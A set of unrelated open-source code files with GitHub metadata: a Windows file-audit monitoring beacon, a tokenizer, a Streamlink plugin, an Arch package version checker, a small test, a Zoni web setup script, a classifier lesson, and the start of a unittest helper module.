__salt__['cmd.run']('auditpol /set /subcategory:"file system" /success:enable /failure:enable')
sys_check = 1
# Validate ACLs on watched folders/files and add if needed
for path in config:
if path == 'win_notify_interval':
continue
if isinstance(config[path], dict):
mask = config[path].get('mask', DEFAULT_MASK)
wtype = config[path].get('wtype', DEFAULT_TYPE)
recurse = config[path].get('recurse', True)
if isinstance(mask, list) and isinstance(wtype, str) and isinstance(recurse, bool):
success = _check_acl(path, mask, wtype, recurse)
if not success:
confirm = _add_acl(path, mask, wtype, recurse)
sys_check = 1
if config[path].get('exclude', False):
for exclude in config[path]['exclude']:
if '*' in exclude:
for wildcard_exclude in glob.iglob(exclude):
_remove_acl(wildcard_exclude)
else:
_remove_acl(exclude)
#Read in events since last call. Time_frame in minutes
ret = _pull_events(config['win_notify_interval'])
if sys_check == 1:
log.error('The ACLs were not setup correctly, or global auditing is not enabled. This could have '
'been remedied, but GP might need to be changed')
if __salt__['config.get']('hubblestack:pulsar:maintenance', False):
# We're in maintenance mode, throw away findings
ret = []
if ret and 'return' in config:
__opts__['grains'] = __grains__
__opts__['pillar'] = __pillar__
__returners__ = salt.loader.returners(__opts__, __salt__)
return_config = config['return']
if isinstance(return_config, salt.ext.six.string_types):
tmp = {}
for conf in return_config.split(','):
tmp[conf] = None
return_config = tmp
for returner_mod in return_config:
returner = '{0}.returner'.format(returner_mod)
if returner not in __returners__:
log.error('Could not find {0} returner for pulsar beacon'.format(config['return']))
return ret
batch_config = config.get('batch')
if isinstance(return_config[returner_mod], dict) and return_config[returner_mod].get('batch'):
batch_config = True
if batch_config:
transformed = []
for item in ret:
transformed.append({'return': item})
if config.get('multiprocessing_return', True):
p = threading.Thread(target=_return, args=((transformed,), returner))
p.daemon = True
p.start()
else:
__returners__[returner](transformed)
else:
for item in ret:
if config.get('multiprocessing_return', True):
p = threading.Thread(target=_return, args=(({'return': item},), returner))
p.daemon = True
p.start()
else:
__returners__[returner]({'return': item})
return []
else:
# Return event data
return ret
def _return(args, returner):
__returners__ = salt.loader.returners(__opts__, __salt__)
__returners__[returner](*args)
def _check_acl(path, mask, wtype, recurse):
audit_dict = {}
success = True
if 'all' in wtype.lower():
wtype = ['Success', 'Failure']
else:
wtype = [wtype]
audit_acl = __salt__['cmd.run']('(Get-Acl {0} -Audit).Audit | fl'.format(path), shell='powershell',
python_shell=True)
if not audit_acl:
success = False
return success
audit_acl = audit_acl.replace('\r','').split('\n')
newlines= []
count = 0
for line in audit_acl:
if ':' not in line and count > 0:
newlines[count-1] += line.strip()
else:
newlines.append(line)
count += 1
for line in newlines:
if line:
if ':' in line:
d = line.split(':')
audit_dict[d[0].strip()] = d[1].strip()
for item in mask:
if item not in audit_dict['FileSystemRights']:
success = False
for item in wtype:
if item not in audit_dict['AuditFlags']:
success = False
if 'Everyone' not in audit_dict['IdentityReference']:
success = False
if recurse:
if 'ContainerInherit' and 'ObjectInherit' not in audit_dict['InheritanceFlags']:
success = False
else:
if 'None' not in audit_dict['InheritanceFlags']:
success = False
if 'None' not in audit_dict['PropagationFlags']:
success = False
return success
def _add_acl(path, mask, wtype, recurse):
'''
This will apply the needed audit ALC to the folder in question using PowerShells access to the .net library and
WMI with the code below:
$path = "C:\Path\here"
$path = path.replace("\","\\")
$user = "Everyone"
$SD = ([WMIClass] "Win32_SecurityDescriptor").CreateInstance()
$Trustee = ([WMIClass] "Win32_Trustee").CreateInstance()
# One for Success and other for Failure events
$ace1 = ([WMIClass] "Win32_ace").CreateInstance()
$ace2 = ([WMIClass] "Win32_ace").CreateInstance()
$SID = (new-object security.principal.ntaccount $user).translate([security.principal.securityidentifier])
[byte[]] $SIDArray = ,0 * $SID.BinaryLength
$SID.GetBinaryForm($SIDArray,0)
$Trustee.Name = $user
$Trustee.SID = $SIDArray
# Auditing
$ace2.AccessMask = 2032127 # [System.Security.AccessControl.FileSystemRights]::FullControl
$ace2.AceFlags = 131 # FAILED_ACCESS_ACE_FLAG (128), CONTAINER_INHERIT_ACE (2), OBJECT_INHERIT_ACE (1)
$ace2.AceType =2 # Audit
$ace2.Trustee = $Trustee
$SD.SACL += $ace1.psobject.baseobject
$SD.SACL += $ace2.psobject.baseobject
$SD.ControlFlags=16
$wPrivilege = Get-WmiObject Win32_LogicalFileSecuritySetting -filter "path='$path'" -EnableAllPrivileges
$wPrivilege.setsecuritydescriptor($SD)
The ACE accessmask map key is below:
1. ReadData - 1
2. CreateFiles - 2
3. AppendData - 4
4. ReadExtendedAttributes - 8
5. WriteExtendedAttributes - 16
6. ExecuteFile - 32
7. DeleteSubdirectoriesAndFiles - 64
8. ReadAttributes - 128
9. WriteAttributes - 256
10. Write - 278 (Combo of CreateFiles, AppendData, WriteAttributes, WriteExtendedAttributes)
11. Delete - 65536
12. ReadPermissions - 131072
13. ChangePermissions - 262144
14. TakeOwnership - 524288
15. Read - 131209 (Combo of ReadData, ReadAttributes, ReadExtendedAttributes, ReadPermissions)
16. ReadAndExecute - 131241 (Combo of ExecuteFile, ReadData, ReadAttributes, ReadExtendedAttributes,
ReadPermissions)
17. Modify - 197055 (Combo of ExecuteFile, ReadData, ReadAttributes, ReadExtendedAttributes,
CreateFiles, AppendData, WriteAttributes, WriteExtendedAttributes,
Delete, ReadPermissions)
The Ace flags map key is below:
1. ObjectInherit - 1
2. ContainerInherit - 2
3. NoPorpagateInherit - 4
4. SuccessfulAccess - 64 (Used with System-audit to generate audit messages for successful access
attempts)
5. FailedAccess - 128 (Used with System-audit to generate audit messages for Failed access attempts)
The Ace type map key is below:
1. Access Allowed - 0
2. Access Denied - 1
3. Audit - 2
If you want multiple values you just add them together to get a desired outcome:
ACCESSMASK of file_add_file, file_add_subdirectory, delete, file_delete_child, write_dac, write_owner:
852038 = 2 + 4 + 65536 + 64 + 262144i
FLAGS of ObjectInherit, ContainerInherit, SuccessfullAccess, FailedAccess:
195 = 1 + 2 + 64 + 128
This calls The function _get_ace_translation() to return the number it needs to set.
:return:
'''
path = path.replace('\\','\\\\')
audit_user = 'Everyone'
audit_rules = ','.join(mask)
if recurse:
inherit_type = 'ContainerInherit,ObjectInherit'
if 'all' in wtype:
audit_type = 'Success,Failure'
else:
audit_type = wtype
access_mask = _get_ace_translation(audit_rules)
flags = _get_ace_translation(inherit_type, audit_type)
__salt__['cmd.run']('$SD = ([WMIClass] "Win32_SecurityDescriptor").CreateInstance();'
'$Trustee = ([WMIClass] "Win32_Trustee").CreateInstance();'
'$ace = ([WMIClass] "Win32_ace").CreateInstance();'
'$SID = (new-object System.Security.Principal.NTAccount {0}).translate([security.principal.securityidentifier]);'
'[byte[]] $SIDArray = ,0 * $SID.BinaryLength;'
'$SID.GetBinaryForm($SIDArray,0);'
'$Trustee.Name = "{0}";'
'$Trustee.SID = $SIDArray;'
'$ace.AccessMask = {1};'
'$ace.AceFlags = {2};'
'$ace.AceType = 2;'
'$ace.Trustee = $Trustee;'
'$SD.SACL += $ace.psobject.baseobject;'
'$SD.ControlFlags=16;'
'$wPrivilege = Get-WmiObject Win32_LogicalFileSecuritySetting -filter "path=\'{3}\'" -EnableAllPrivileges;'
'$wPrivilege.setsecuritydescriptor($SD)'.format(audit_user, access_mask, flags, path),
shell='powershell', python_shell=True)
return 'ACL set up for {0} - with {1} user, {2} access mask, {3} flags'.format(path, audit_user, access_mask, flags)
def _remove_acl(path):
'''
This will remove a currently configured ACL on the folder submited as item. This will be needed when you have
a sub file or folder that you want to explicitly ignore within a folder being monitored. You need to pass in the
full folder path name for this to work properly
:param item:
:return:
'''
path = path.replace('\\','\\\\')
__salt__['cmd.run']('$SD = ([WMIClass] "Win32_SecurityDescriptor").CreateInstance();'
'$SD.ControlFlags=16;'
'$wPrivilege = Get-WmiObject Win32_LogicalFileSecuritySetting -filter "path=\'{0}\'" -EnableAllPrivileges;'
'$wPrivilege.setsecuritydescriptor($SD)'.format(path), shell='powershell', python_shell=True)
def _pull_events(time_frame):
events_list = []
events_output = __salt__['cmd.run_stdout']('mode con:cols=1000 lines=1000; Get-EventLog -LogName Security '
'-After ((Get-Date).AddSeconds(-{0})) -InstanceId 4663 | fl'.format(
time_frame), shell='powershell', python_shell=True)
events = events_output.split('\n\n')
for event in events:
if event:
event_dict = {}
items = event.split('\n')
for item in items:
if ':' in item:
item.replace('\t', '')
k, v = item.split(':', 1)
event_dict[k.strip()] = v.strip()
event_dict['Accesses'] = _get_access_translation(event_dict['Accesses'])
event_dict['Hash'] = _get_item_hash(event_dict['Object Name'])
#needs hostname, checksum, filepath, time stamp, action taken
events_list.append({k: event_dict[k] for k in ('EntryType', 'Accesses', 'TimeGenerated', 'Object Name', 'Hash')})
return events_list
def _get_ace_translation(value, *args):
'''
This will take the ace name and return the total number accosciated to all the ace accessmasks and flags
Below you will find all the names accosiated to the numbers:
'''
ret = 0
ace_dict = {'ReadData': 1, 'CreateFiles': 2, 'AppendData': 4, 'ReadExtendedAttributes': 8,
'WriteExtendedAttributes': 16, 'ExecuteFile': 32, 'DeleteSubdirectoriesAndFiles': 64,
'ReadAttributes': 128, 'WriteAttributes': 256, 'Write': 278, 'Delete': 65536, 'ReadPermissions': 131072,
'ChangePermissions': 262144, 'TakeOwnership': 524288, 'Read': 131209, 'ReadAndExecute': 131241,
'Modify': 197055, 'ObjectInherit': 1, 'ContainerInherit': 2, 'NoPropagateInherit': 4, 'Success': 64,
'Failure': 128}
aces = value.split(',')
for arg in args:
aces.extend(arg.split(','))
for ace in aces:
if ace in ace_dict:
ret += ace_dict[ace]
return ret
def _get_access_translation(access):
'''
This will take the access number within the event, and return back a meaningful translation.
These are all the translations of accesses:
1537 DELETE - used to grant or deny delete access.
1538 READ_CONTROL - used to grant or deny read access to the security descriptor and owner.
1539 WRITE_DAC - used to grant or deny write access to the discretionary ACL.
1540 WRITE_OWNER - used to assign a write owner.
1541 SYNCHRONIZE - used to synchronize access and to allow a process to wait for an object to enter the signaled state.
1542 ACCESS_SYS_SEC
4416 ReadData
4417 WriteData
4418 AppendData
4419 ReadEA (Extended Attribute)
4420 WriteEA (Extended Attribute)
4421 Execute/Traverse
4423 ReadAttributes
4424 WriteAttributes
4432 Query Key Value
4433 Set Key Value
4434 Create Sub Key
4435 Enumerate sub-keys
4436 Notify about changes to keys
4437 Create Link
6931 Print
:param access:
:return access_return:
'''
access_dict = {'1537': 'Delete', '1538': 'Read Control', '1539': 'Write DAC', '1540': 'Write Owner',
'1541': 'Synchronize', '1542': 'Access Sys Sec', '4416': 'Read Data', '4417': 'Write Data',
'4418': 'Append Data', '4419': 'Read EA', '4420': 'Write EA', '4421': 'Execute/Traverse',
'4423': 'Read Attributes', '4424': 'Write Attributes', '4432': 'Query Key Value',
'4433': 'Set Key Value', '4434': 'Create Sub Key', '4435': 'Enumerate Sub-Keys',
'4436': 'Notify About Changes to Keys', '4437': 'Create Link', '6931': 'Print', }
access = access.replace('%%', '').strip()
ret_str = access_dict.get(access, False)
if ret_str:
return ret_str
else:
return 'Access number {0} is not a recognized access code.'.format(access)
def _get_item_hash(item):
item = item.replace('\\\\','\\')
test = os.path.isfile(item)
if os.path.isfile(item):
hashy = __salt__['file.get_hash']('{0}'.format(item))
return hashy
else:
return 'Item is a directory'
| {
"content_hash": "3a3f0335f77e457ed3822a77da3c682f",
"timestamp": "",
"source": "github",
"line_count": 498,
"max_line_length": 137,
"avg_line_length": 43.062248995983936,
"alnum_prop": 0.5522965726276521,
"repo_name": "HubbleStack/Pulsar",
"id": "06352cef15c0c8396ea3580fc3122445181f59f2",
"size": "21445",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "_beacons/win_pulsar.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "37294"
}
],
"symlink_target": ""
} |
"""
Tokenize words.
__author__ = [email protected], [email protected]
"""
import re
def tokenize(line):
assert isinstance(line, str), "The input is not a string, was a %r"%type(line)
line = line.strip().lower()
ord = re.split("([^a-zA-Z0-9æøåÆØÅ])", line)
ord = [o for o in ord if o != ' ' and o != '']
return ord
| {
"content_hash": "eb32d1e2da4e1247e5403878f839d2b4",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 82,
"avg_line_length": 20.41176470588235,
"alnum_prop": 0.5994236311239193,
"repo_name": "hanscje/PySearch",
"id": "3c72cb408bd1306370db9f9f96367a895060a648",
"size": "353",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Tokenizer/tokenize.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12329"
}
],
"symlink_target": ""
} |
import logging
import re
from urllib.parse import unquote, urlparse
from streamlink.plugin import Plugin, pluginmatcher
from streamlink.plugin.api import validate
from streamlink.stream import HLSStream
from streamlink.utils.url import update_scheme
log = logging.getLogger(__name__)
@pluginmatcher(re.compile(
r"https?://(?:www\.)?(?:mediaklikk|m4sport|hirado|petofilive)\.hu/"
))
class Mediaklikk(Plugin):
PLAYER_URL = "https://player.mediaklikk.hu/playernew/player.php"
_re_player_manager = re.compile(r"""
mtva_player_manager\.player\s*\(\s*
document\.getElementById\(\s*"\w+"\s*\)\s*,\s*
(?P<json>{.*?})\s*
\)\s*;
""", re.VERBOSE | re.DOTALL)
_re_player_json = re.compile(r"pl\.setup\s*\(\s*(?P<json>{.*?})\s*\)\s*;", re.DOTALL)
def _get_streams(self):
params = self.session.http.get(self.url, schema=validate.Schema(
validate.transform(self._re_player_manager.search),
validate.any(None, validate.all(
validate.get("json"),
validate.parse_json(),
{
"contentId": validate.any(str, int),
validate.optional("streamId"): str,
validate.optional("idec"): str,
validate.optional("token"): str
}
))
))
if not params:
log.error("Could not find player manager data")
return
params.update({
"video": (unquote(params.pop("token"))
if params.get("token") is not None else
params.pop("streamId")),
"noflash": "yes",
"embedded": "0",
})
url_parsed = urlparse(self.url)
skip_vods = url_parsed.netloc.endswith("m4sport.hu") and url_parsed.path.startswith("/elo")
self.session.http.headers.update({"Referer": self.url})
playlists = self.session.http.get(self.PLAYER_URL, params=params, schema=validate.Schema(
validate.transform(self._re_player_json.search),
validate.any(None, validate.all(
validate.get("json"),
validate.parse_json(),
{"playlist": [{
"file": validate.url(),
"type": str
}]},
validate.get("playlist"),
validate.filter(lambda p: p["type"] == "hls"),
validate.filter(lambda p: not skip_vods or "vod" not in p["file"]),
validate.map(lambda p: update_scheme(self.url, p["file"]))
))
))
for url in playlists or []:
yield from HLSStream.parse_variant_playlist(self.session, url).items()
__plugin__ = Mediaklikk
| {
"content_hash": "b158f8f53ad687b83cda4331ac6d5d5e",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 99,
"avg_line_length": 35.58974358974359,
"alnum_prop": 0.5435878962536023,
"repo_name": "melmorabity/streamlink",
"id": "6b50bd96157b3b0f41436bb0e234cb782493c00f",
"size": "2776",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/streamlink/plugins/mediaklikk.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "838"
},
{
"name": "Python",
"bytes": "1537432"
},
{
"name": "Shell",
"bytes": "18707"
}
],
"symlink_target": ""
} |
from nvchecker.api import session, GetVersionError
URL = 'https://www.archlinux.org/packages/search/json/'
async def request(pkg):
res = await session.get(URL, params={"name": pkg})
return res.json()
async def get_version(name, conf, *, cache, **kwargs):
pkg = conf.get('archpkg') or name
strip_release = conf.get('strip_release', False)
provided = conf.get('provided')
data = await cache.get(pkg, request)
if not data['results']:
raise GetVersionError('Arch package not found')
r = [r for r in data['results'] if r['repo'] != 'testing'][0]
if provided:
provides = dict(x.split('=', 1) for x in r['provides'] if '=' in x)
version = provides.get(provided, None)
if strip_release:
version = version.split('-', 1)[0]
elif strip_release:
version = r['pkgver']
else:
version = r['pkgver'] + '-' + r['pkgrel']
return version
| {
"content_hash": "dfbc7b55ac13b450d25b89f13ac482dd",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 71,
"avg_line_length": 28.419354838709676,
"alnum_prop": 0.6435868331441543,
"repo_name": "lilydjwg/nvchecker",
"id": "de321c4e9254bc3de5cb7445de0318a70dd56cd9",
"size": "961",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nvchecker_source/archpkg.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "146836"
}
],
"symlink_target": ""
} |
import nose
import requests
import fixture
@nose.with_setup(fixture.start_tangelo, fixture.stop_tangelo)
def test_version():
response = requests.get(fixture.plugin_url("tangelo", "version"))
expected = "0.8.1-dev"
assert response.content == expected
| {
"content_hash": "e0385dfdf5c48b74c0c216743f5fbc17",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 69,
"avg_line_length": 22.166666666666668,
"alnum_prop": 0.7255639097744361,
"repo_name": "mathstuf/tangelo",
"id": "fbf6aa035a95d405be3d6dc4f9c0703553d3e1a2",
"size": "266",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/tangelo-version.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "1551"
},
{
"name": "HTML",
"bytes": "49052"
},
{
"name": "JavaScript",
"bytes": "427413"
},
{
"name": "Python",
"bytes": "125716"
}
],
"symlink_target": ""
} |
#!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# $Id$
#
import os
import sys
import time
import string
import traceback
import optparse
import shutil
import urllib
import tarfile
a = os.path.join("../")
sys.path.append(a)
a = os.path.join("../../")
sys.path.append(a)
a = os.path.join("../../..")
sys.path.append(a)
from zoni.extra.util import *
from zoni.version import *
from zoni.bootstrap.pxe import Pxe
def main():
''' This file sets up the web files for Zoni '''
ver = version.split(" ")[0]
rev = revision
parser = optparse.OptionParser(usage="%prog ", version="%prog " + ver + " " + rev)
(options, args) = parser.parse_args()
(configs, configFiles) = getConfig()
ZoniWebSetup(configs)
ZoniCreateWebConfigFile(configs)
def ZoniCreateWebConfigFile(config):
zoniBaseDir = config['installBaseDir']
docRoot = config['wwwDocumentRoot']
baseDir = config['registrationBaseDir']
dbHost = config['dbHost']
dbPort = str(config['dbPort'])
dbInst = config['dbInst']
dbUser = config['dbUser']
dbPassword = config['dbPassword']
zoniHomeDomain = config['zoniHomeDomain']
zoniHomeNetwork = config['zoniHomeNetwork']
zoniIpmiNetwork = config['zoniIpmiNetwork']
zoniRoot = os.path.join(docRoot, baseDir)
includeDir = os.path.join(docRoot, baseDir, "include")
includeFile = os.path.join(includeDir, "zoni_www_registration.conf")
a = "<?php\n"
a += "/* Generated by Zoni on " + time.asctime() + " */\n\n\n"
a += "function init_globals() {\n"
a += " $G = array();\n"
a += "\n"
a += " // Zoni Install Base\n";
a += " $G['ZONI_BASE_DIR'] = \"" + zoniBaseDir + "\";\n"
a += "\n"
a += " // webserver directories\n";
a += " $G['ABSROOT'] = \"" + zoniRoot + "\";\n"
a += " $G['WEBROOT'] = \"" + baseDir + "\";\n"
a += "\n"
a += " // DB info\n";
a += " $G['DB_HOST'] = \"" + dbHost + "\";\n"
a += " $G['DB_USER'] = \"" + dbUser + "\";\n"
a += " $G['DB_PASS'] = \"" + dbPassword + "\";\n"
a += " $G['DB_INST'] = \"" + dbInst + "\";\n"
a += " $G['DB_PORT'] = \"" + dbPort + "\";\n"
a += "\n"
a += " // Zoni Home Domain \n";
a += " $G['ZONI_HOME_DOMAIN'] = \"" + zoniHomeDomain + "\";\n"
a += " $G['ZONI_HOME_NETWORK'] = \"" + zoniHomeNetwork + "\";\n"
a += " $G['ZONI_IPMI_NETWORK'] = \"" + zoniIpmiNetwork + "\";\n"
a += "\n"
a += " ini_set('display_errors', 1);\n"
a += " ini_set('error_reporting', E_ALL);\n"
a += "\n"
a += " return $G;\n"
a += "}\n"
a += "?>\n"
# Rename any existing
if os.path.exists(includeFile):
includeFileBak = os.path.join(includeFile + "." + str(int(time.time())))
shutil.move(includeFile, includeFileBak)
f = open(includeFile, "w")
f.write(a)
f.close()
@checkSuper
def ZoniWebSetup(config):
docRoot = config['wwwDocumentRoot']
baseDir = config['registrationBaseDir']
zoniInstallDir = config['installBaseDir']
zoniWebRoot = os.path.join(docRoot, baseDir )
if not (createDir(zoniWebRoot, 1)): print "Please use sudo"; exit()
zoniIncludeDir = os.path.join(zoniWebRoot, "include")
createDir(zoniIncludeDir)
zoniRegisterDir = os.path.join(zoniWebRoot, "register")
createDir(zoniRegisterDir)
sys.stdout.write(" Copying zoni_function.php\n")
zoniIncludeSrcFile = os.path.join(zoniInstallDir, "src", "zoni", "system", "registration", "www", "include", "zoni_functions.php")
shutil.copy(zoniIncludeSrcFile, zoniIncludeDir)
sys.stdout.write(" Copying register_node\n")
zoniRegisterSrcFile = os.path.join(zoniInstallDir, "src", "zoni", "system", "registration", "register", "register_node")
shutil.copy(zoniRegisterSrcFile, zoniRegisterDir)
sys.stdout.write(" Copying register_automate\n")
zoniRegisterAutoSrcFile = os.path.join(zoniInstallDir, "src", "zoni", "system", "registration", "register", "register_automate")
shutil.copy(zoniRegisterAutoSrcFile, zoniRegisterDir)
sys.stdout.write(" Copying zoni-register.php\n")
zoniRegisterSrcFile = os.path.join(zoniInstallDir, "src", "zoni", "system", "registration", "www", "zoni-register.php")
shutil.copy(zoniRegisterSrcFile, zoniWebRoot)
if __name__ in "__main__":
main()
| {
"content_hash": "36be6b32cc54016afe1e3ac5365f804e",
"timestamp": "",
"source": "github",
"line_count": 151,
"max_line_length": 132,
"avg_line_length": 31.894039735099337,
"alnum_prop": 0.6619601328903655,
"repo_name": "apache/tashi",
"id": "3b2fa1a81858f43a235d07ed86d10b994d425e40",
"size": "4816",
"binary": false,
"copies": "1",
"ref": "refs/heads/cmu",
"path": "src/zoni/install/www/zoniWebSetup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "3092"
},
{
"name": "Makefile",
"bytes": "7418"
},
{
"name": "PHP",
"bytes": "28750"
},
{
"name": "Python",
"bytes": "573021"
},
{
"name": "Shell",
"bytes": "25933"
},
{
"name": "Thrift",
"bytes": "7777"
}
],
"symlink_target": ""
} |
import matplotlib.pyplot as plt
from prep_terrain_data import makeTerrainData
from class_vis import prettyPicture
from time import time
features_train, labels_train, features_test, labels_test = makeTerrainData()
### the training data (features_train, labels_train) have both "fast" and "slow" points mixed
### in together--separate them so we can give them different colors in the scatterplot,
### and visually identify them
grade_fast = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==0]
bumpy_fast = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==0]
grade_slow = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==1]
bumpy_slow = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==1]
#### initial visualization
plt.xlim(0.0, 1.0)
plt.ylim(0.0, 1.0)
plt.scatter(bumpy_fast, grade_fast, color = "b", label="fast")
plt.scatter(grade_slow, bumpy_slow, color = "r", label="slow")
plt.legend()
plt.xlabel("bumpiness")
plt.ylabel("grade")
plt.show()
#################################################################################
### your code here! name your classifier object clf if you want the
### visualization code (prettyPicture) to show you the decision boundary
# K Nearest Neighbor
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score
clf = KNeighborsClassifier(n_neighbors=1)
t0 = time()
clf.fit(features_train, labels_train)
print "training time:", round(time()-t0, 3), "s"
t0 = time()
pred = clf.predict(features_test)
print "predicting time:", round(time()-t0, 3), "s"
acc = accuracy_score(pred, labels_test)
print acc
# Random Forest
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
clf = RandomForestClassifier(n_estimators=10)
t0 = time()
clf.fit(features_train, labels_train)
print "training time:", round(time()-t0, 3), "s"
t0 = time()
pred = clf.predict(features_test)
print "predicting time:", round(time()-t0, 3), "s"
acc = accuracy_score(pred, labels_test)
print acc
# Addaboost
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import accuracy_score
clf = AdaBoostClassifier(n_estimators=100)
t0 = time()
clf.fit(features_train, labels_train)
print "training time:", round(time()-t0, 3), "s"
t0 = time()
pred = clf.predict(features_test)
print "predicting time:", round(time()-t0, 3), "s"
acc = accuracy_score(pred, labels_test)
print acc
try:
prettyPicture(clf, features_test, labels_test)
except NameError:
pass
| {
"content_hash": "3c68157c5afbd38b31ea47a36bb4b2be",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 99,
"avg_line_length": 31.817073170731707,
"alnum_prop": 0.7117669605212725,
"repo_name": "tuanvu216/udacity-course",
"id": "5dc3d4a8b93bbc6e97ba7ef3286a848b092674b6",
"size": "2628",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "intro_to_machine_learning/lesson/lesson_4_choose_your_own_algorithm/your_algorithm.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3736"
},
{
"name": "HTML",
"bytes": "143388"
},
{
"name": "JavaScript",
"bytes": "169689"
},
{
"name": "Jupyter Notebook",
"bytes": "3237655"
},
{
"name": "Python",
"bytes": "400129"
},
{
"name": "Ruby",
"bytes": "448"
},
{
"name": "Shell",
"bytes": "538"
}
],
"symlink_target": ""
} |
import unittest
import os
import os.path
import inspect
import functools
import contextlib
import traceback as traceback_lib
try:
import ctypes
except ImportError:
ctypes = None
import sys
try:
import stackless._wrap as stackless_wrap
except ImportError:
stackless_wrap = None
__pausable_unittest = True
def safe_repr(obj, max_length=100):
try:
result = repr(obj)
except Exception:
result = object.__repr__(obj)
if max_length is None or len(result) < max_length:
return result
return result[:max_length] + ' [truncated]...'
def _find_traceback_in_frame(frame):
if stackless_wrap and hasattr(stackless_wrap, "frame"):
# Really hacking code...
# See prickelpit.c
obj = stackless_wrap.frame.__reduce__(frame)
try:
for traceback in reversed(obj[-1][-1]):
if inspect.istraceback(traceback):
return traceback
except BaseException:
pass
return None
def _clear_locals_in_traceback(traceback, target_frames):
try:
frame = traceback.tb_frame
if frame is None or frame in target_frames:
return
new_hash = {}
for key in frame.f_locals:
new_hash[key] = None
if hasattr(ctypes, "pythonapi") and hasattr(ctypes.pythonapi,
"PyFrame_LocalsToFast"):
frame.f_locals.update(new_hash)
ctypes.pythonapi.PyFrame_LocalsToFast(ctypes.py_object(frame),
ctypes.c_int(0))
elif '__pypy__' in sys.builtin_module_names:
import __pypy__
if hasattr(__pypy__, "locals_to_fast"):
frame.f_locals.update(new_hash)
__pypy__.locals_to_fast(frame)
finally:
del frame
def _clear_unnecessary_locals():
# For Stackless Python 3.6
if hasattr(traceback_lib, "clear_frames"):
traceback = sys.exc_info()[2]
if traceback:
traceback_lib.clear_frames(traceback)
return
# For Stackless Python 2.7
frame = inspect.currentframe().f_back
target_frames = []
try:
tag_to_detect_bottom_of_stack = "_tag_for_clear_unnecessary_locals"
while frame:
locals_hash = frame.f_locals
if locals_hash and tag_to_detect_bottom_of_stack in locals_hash:
break
target_frames.append(frame)
frame = frame.f_back
traceback = sys.exc_info()[2]
try:
if traceback:
while traceback:
_clear_locals_in_traceback(traceback, target_frames)
traceback = traceback.tb_next
for frame in target_frames:
traceback = _find_traceback_in_frame(frame)
while traceback:
_clear_locals_in_traceback(traceback, target_frames)
traceback = traceback.tb_next
finally:
del traceback
finally:
del frame
del target_frames
def log_assertion1(method_name):
u"""
Wrapper method to log assertion.
This wrapper expects that method takes 1 parameter and msg parameter.
"""
method = getattr(unittest.TestCase, method_name)
@functools.wraps(method)
def wrapper(self, arg, msg=None):
error = False
log_assertion_calling = self._log_assertion_calling
if msg is None:
msg = safe_repr(arg, self._msg_repr_max_length)
else:
msg = "%s (%s)" % (msg, safe_repr(arg, self._msg_repr_max_length))
try:
self._log_assertion_calling = True
method(self, arg, msg)
except BaseException:
error = True
raise
finally:
if not error and not log_assertion_calling:
frame = inspect.currentframe().f_back
self.log_for_assertion(
method_name, frame.f_lineno,
os.path.basename(frame.f_code.co_filename), msg)
self._log_assertion_calling = log_assertion_calling
return wrapper
def log_assertion2(method_name):
u"""
Wrapper method to log assertion.
This wrapper expects that method takes 1 parameter and msg parameter.
"""
method = getattr(unittest.TestCase, method_name)
@functools.wraps(method)
def wrapper(self, first, second, msg=None):
error = False
log_assertion_calling = self._log_assertion_calling
if msg is None:
msg = "%s, %s" % (safe_repr(first, self._msg_repr_max_length),
safe_repr(second, self._msg_repr_max_length))
else:
msg = "%s (%s, %s)" % (
msg, safe_repr(first, self._msg_repr_max_length),
safe_repr(second, self._msg_repr_max_length))
try:
self._log_assertion_calling = True
method(self, first, second, msg)
except BaseException:
error = True
raise
finally:
if not error and not log_assertion_calling:
frame = inspect.currentframe().f_back
self.log_for_assertion(
method_name, frame.f_lineno,
os.path.basename(frame.f_code.co_filename), msg)
self._log_assertion_calling = log_assertion_calling
return wrapper
def log_assertion_almost(method_name):
u"""
Wrap assertAlmostEqual and assertNotAlmostEqual.
"""
import functools
method = getattr(unittest.TestCase, method_name)
@functools.wraps(method)
def wrapper(self, first, second, places=7, msg=None, delta=None):
error = False
log_assertion_calling = self._log_assertion_calling
if msg is None:
msg = "%s, %s" % (safe_repr(first, self._msg_repr_max_length),
safe_repr(second, self._msg_repr_max_length))
else:
msg = "%s (%s, %s)" % (
msg, safe_repr(first, self._msg_repr_max_length),
safe_repr(second, self._msg_repr_max_length))
try:
